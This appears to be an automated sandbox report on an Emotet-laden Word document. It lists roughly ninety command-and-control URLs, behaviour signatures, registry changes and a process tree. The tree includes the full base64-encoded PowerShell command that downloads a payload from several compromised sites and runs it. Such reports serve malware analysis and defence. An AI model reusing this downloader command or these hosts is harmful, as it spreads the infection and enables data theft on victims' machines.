Task
task1
Sample
Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc
Resource
win7
0 signatures
Task
task2
Sample
Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc
Resource
win10
0 signatures
General
-
Target
Docs_34df7390e3fba4cc8b8de327c79c3741.3
-
Sample
191010-j1ayh7x2f6
-
SHA256
51de13d18a23740342f1c681de4cb6c2baf116f2a4df4730c5338439d05823e4
Score
N/A
Malware Config
Extracted
Family
emotet
C2
http://201.184.105.242:443/
http://24.45.195.162:7080/
http://24.45.195.162:8443/
http://94.192.225.46/
http://80.11.163.139:443/
http://133.167.80.63:7080/
http://198.199.114.69:8080/
http://80.79.23.144:443/
http://192.254.173.31:8080/
http://67.225.229.55:8080/
http://190.108.228.48:990/
http://62.75.187.192:8080/
http://185.94.252.13:443/
http://94.205.247.10/
http://211.63.71.72:8080/
http://59.103.164.174/
http://192.81.213.192:8080/
http://27.4.80.183:443/
http://190.145.67.134:8090/
http://115.78.95.230:443/
http://104.131.11.150:8080/
http://95.128.43.213:8080/
http://212.71.234.16:8080/
http://178.254.6.27:7080/
http://86.98.25.30:53/
http://91.205.215.66:8080/
http://188.166.253.46:8080/
http://80.11.163.139:21/
http://186.75.241.230/
http://190.106.97.230:443/
http://78.24.219.147:8080/
http://217.160.182.191:8080/
http://173.212.203.26:8080/
http://92.222.216.44:8080/
http://136.243.177.26:8080/
http://37.157.194.134:443/
http://190.211.207.11:443/
http://104.236.246.93:8080/
http://190.18.146.70/
http://103.255.150.84/
http://138.201.140.110:8080/
http://41.220.119.246/
http://200.71.148.138:8080/
http://85.54.169.141:8080/
http://144.139.247.220/
http://149.202.153.252:8080/
http://31.172.240.91:8080/
http://186.4.172.5:443/
http://178.79.161.166:443/
http://186.4.172.5:8080/
http://206.189.98.125:8080/
http://87.106.139.101:8080/
http://46.105.131.87/
http://45.123.3.54:443/
http://222.214.218.192:8080/
http://85.106.1.166:50000/
http://83.136.245.190:8080/
http://179.32.19.219:22/
http://152.89.236.214:8080/
http://181.31.213.158:8080/
http://87.106.136.232:8080/
http://47.41.213.2:22/
http://201.251.43.69:8080/
http://24.51.106.145:21/
http://87.230.19.21:8080/
http://190.228.72.244:53/
http://181.143.194.138:443/
http://182.176.106.43:995/
http://31.12.67.62:7080/
http://182.76.6.2:8080/
http://190.226.44.20:21/
http://181.143.53.227:21/
http://189.209.217.49/
http://190.186.203.55/
http://27.147.163.188:8080/
http://159.65.25.128:8080/
http://101.187.237.217:20/
http://80.11.163.139:443/
http://182.176.132.213:8090/
http://199.19.237.192/
http://124.240.198.66/
http://5.196.74.210:8080/
http://190.53.135.159:21/
http://186.4.172.5:20/
http://45.33.49.124:443/
http://92.233.128.13:143/
http://85.104.59.244:20/
http://169.239.182.217:8080/
Signatures
-
Suspicious behavior: AddClipboardFormatListener
-
Suspicious use of SetWindowsHookEx
-
Processes:
WINWORD.EXEat description ioc process 19329 File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm WINWORD.EXE 19360 File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm WINWORD.EXE 19360 File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm WINWORD.EXE 24570 File opened for modification C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc WINWORD.EXE 25928 File created C:\Users\Admin\AppData\Local\Temp\~$cs_34df7390e3fba4cc8b8de327c79c3741.3.doc WINWORD.EXE -
Drops file in system dir 5 IoCs
Processes:
WINWORD.EXEpowershell.exe320.exeat description ioc process 26848 File deleted C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD WINWORD.EXE 26848 File created C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD WINWORD.EXE 33775 File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT WINWORD.EXE 34601 File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe 59640 File renamed C:\Users\Admin\320.exe => C:\Windows\SysWOW64\loadarouter.exe 320.exe -
Modifies registry class 1 TTPs 280 IoCs
Processes:
WINWORD.EXEat description ioc process 28143 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4} WINWORD.EXE 28143 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0 WINWORD.EXE 28143 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE 28143 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS WINWORD.EXE 28143 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS\ = "6" WINWORD.EXE 28143 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0 WINWORD.EXE 28143 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32 WINWORD.EXE 28143 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" WINWORD.EXE 28143 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR WINWORD.EXE 28143 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4} WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0 WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS\ = "6" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0 WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32 WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE 28143 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE 28143 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE -
Suspicious use of FindShellTrayWindow
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exeat description process 38096 Token: SeDebugPrivilege powershell.exe -
Suspicious behavior: EnumeratesProcesses
-
Uses Task Scheduler COM API 1 TTPs 12 IoCs
Processes:
OSPPSVC.EXEat description ioc process 43525 Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} OSPPSVC.EXE 43525 Key queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} OSPPSVC.EXE 43525 Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs OSPPSVC.EXE 43525 Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid OSPPSVC.EXE 43525 Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID\ OSPPSVC.EXE 43525 Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ OSPPSVC.EXE 43525 Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 OSPPSVC.EXE 43525 Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\InprocServer32 OSPPSVC.EXE 43525 Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ OSPPSVC.EXE 43525 Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ThreadingModel OSPPSVC.EXE 43525 Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32 OSPPSVC.EXE 43525 Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler OSPPSVC.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
powershell.exe320.exeloadarouter.exeat description process target process 52791 PID 1840 wrote to memory of 1456 powershell.exe 320.exe 53524 PID 1456 wrote to memory of 1980 320.exe 320.exe 60529 PID 1268 wrote to memory of 1536 loadarouter.exe loadarouter.exe -
Processes:
320.exedescription ioc process Event created Global\E64C019BB 320.exe -
Suspicious behavior: EmotetMutantsSpam
-
emotet family
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc"1⤵
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID:1452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcAOABjADIAOQA3ADcAYwB4ADMAMAA9ACcAeAA4ADIAMAAwADQANAA1ADQANwAxADEANwAnADsAJABjADkAOQAwAGMAOQAwADkAMgA1ADkANwAgAD0AIAAnADMAMgAwACcAOwAkAGMANgA1ADEAOQA5ADQANQA0ADAAMAA9ACcAYwA2ADIANQBjADkANwBjADAAMABjAGIAJwA7ACQAeAA3ADgAYwB4ADkANQAyAGIAOAA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADkAOQAwAGMAOQAwADkAMgA1ADkANwArACcALgBlAHgAZQAnADsAJAB4ADAAeABjADIAMAB4AGIAMAAzAHgAPQAnAHgAMAA1AHgANAAxADAAOQBiADAAOQAnADsAJABjADEAMwA0ADUANAB4ADgAYwB4AHgANAAzAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAVAAuAHcARQBiAGMAbABpAEUATgB0ADsAJABiADAAMABjADYAYwAxADgANwA5ADkANgA9ACcAaAB0AHQAcAA6AC8ALwBlAHIAYQBrAG8AbgBsAGEAdwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFEAaQBtAGEAeQBKAHUATQBZAC8AQABoAHQAdABwADoALwAvAGMAYQByAGUAZQByAHAAbAB1AHMAcwBhAHQAbgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBZAG4ASwBjAGMAbgBoAFoASwAvAEAAaAB0AHQAcAA6AC8ALwByAGEAbQBlAHMAaAB6AGEAdwBhAHIALgBjAG8AbQAvADMAbABqAGoANgAvAHcAUQBzAHQAdgBlAE0AQQBHAG0ALwBAAGgAdAB0AHAAOgAvAC8AcABsAGEAbgBlAHQAbABhAG4AYwBlAHIALgBjAG8AbQAvAGgAOAByAGcAZQAvAGsAaQBtADYANgBfAGEAZQBxAG4AYQA4ADAALQAyADAAOAA1AC8AQABoAHQAdABwADoALwAvAHAAcgBhAGQAbwBwAHIAbwAuAHIAdQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAcABpAFYARQBvAGYALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwBAACcAKQA7ACQAeAAwAGMAOQAzAGIAMwA2ADQANgAzADcAPQAnAGIAOAA5ADAANABiADQAMwAyADMAMAA5ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4ADMAOQAwADcAMgAwAGIAYwBjADYAMwAwACAAaQBuACAAJABiADAAMABjADYAYwAxADgANwA5ADkANgApAHsAdAByAHkAewAkAGMAMQAzADQANQA0AHgAOABjAHgAeAA0ADMALgAiAEQAYABvAFcAbgBsAE8AYQBkAEYAYABJAGwARQAiACgAJAB4ADMAOQAwADcAMgAwAGIAYwBjADYAMwAwACwAIAAkAHgANwA4AGMAeAA5ADUAMgBiADgAOAApADsAJABiADAAMAAyADAAOAA4AGIAMABiAHgAMAA9ACcAYwAzAGIANAA5ADAANAB4ADQAeAAzADMAYwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAHgANwA4AGMAeAA5ADUAMgBiADgAOAApAC4AIgBsAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJAB4ADcAOABjAHgAOQA1ADIAYgA4ADgAKQA7ACQAYwA3ADEAMAB4ADUANgB4ADAAeAA5ADQAOQA9ACcAYgAzADgANgAwADEAMwB4AHgAeAA1ADYAMAAnADsAYgByAGUAYQBrADsAJABiADAANQBjAGIANAA5ADAAOQAzADAAYgA9ACcAeAB4ADMAOQBiADAAMAA2ADIAOAA3ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwA3ADAANgBiADQANwAwADAANwA2AD0AJwBiADAAYwBjAGMAMAA0ADAAeABjADAAMAAxACcA1⤵
- Drops file in system dir
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "802564112872273931434410250278590852-82112389151222317660531298-936447053"1⤵PID:1988
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"1⤵
- Uses Task Scheduler COM API
PID:1940
-
C:\Users\Admin\320.exe"C:\Users\Admin\320.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1456
-
C:\Users\Admin\320.exe--c73fdd8f1⤵
- Drops file in system dir
- Emotet Sync
PID:1980
-
C:\Windows\SysWOW64\loadarouter.exe"C:\Windows\SysWOW64\loadarouter.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1268
-
C:\Windows\SysWOW64\loadarouter.exe--f7a216da1⤵PID:1536